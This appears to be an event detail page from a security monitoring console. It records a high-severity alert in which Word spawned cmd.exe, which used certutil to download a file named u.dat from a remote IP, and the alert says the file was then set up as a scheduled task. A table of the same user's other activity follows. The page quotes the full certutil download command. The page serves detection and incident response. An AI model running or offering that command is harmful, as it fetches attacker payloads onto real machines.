All events
// Operations
Process Execution
winword.exe spawned cmd.exe which invoked certutil to retrieve a remote file
EVT-7F923BHigh
Command line
cmd.exe /c certutil -urlcache -split -f http://45.61.136.14/u.dat %TEMP%\u.dat
Same principal
Other activity for ekowalski around this time
| Time | Event | Severity | Host |
|---|---|---|---|
| 2026-09-04 17:24:11Z | Authentication Failure | Low | WS-FIN-007 |
| 2026-09-04 17:46:09Z | Network Allow | Medium | — |
| 2026-09-04 17:47:04Z | Persistence Created | High | WS-FIN-004 |
| 2026-09-04 17:52:54Z | Authentication Failure | Low | WS-FIN-004 |
| 2026-09-04 18:02:03Z | Authentication Success | Info | WS-FIN-012 |
| 2026-09-04 18:26:22Z | Authentication Success | Info | WS-FIN-004 |
Record
- Source
- CrowdStrike FalconEndpoint
- Event type
- PROCESS_EXECUTION
- Observed
Pivot
Every identifier on this record, as a one-click hunt.
Alerts raised
- Word spawned a shell that downloaded a remote payloadHigh
winword.exe created cmd.exe on WS-FIN-004, which used certutil to retrieve u.dat from 45.61.136.14 and registered it as a recurring scheduled task.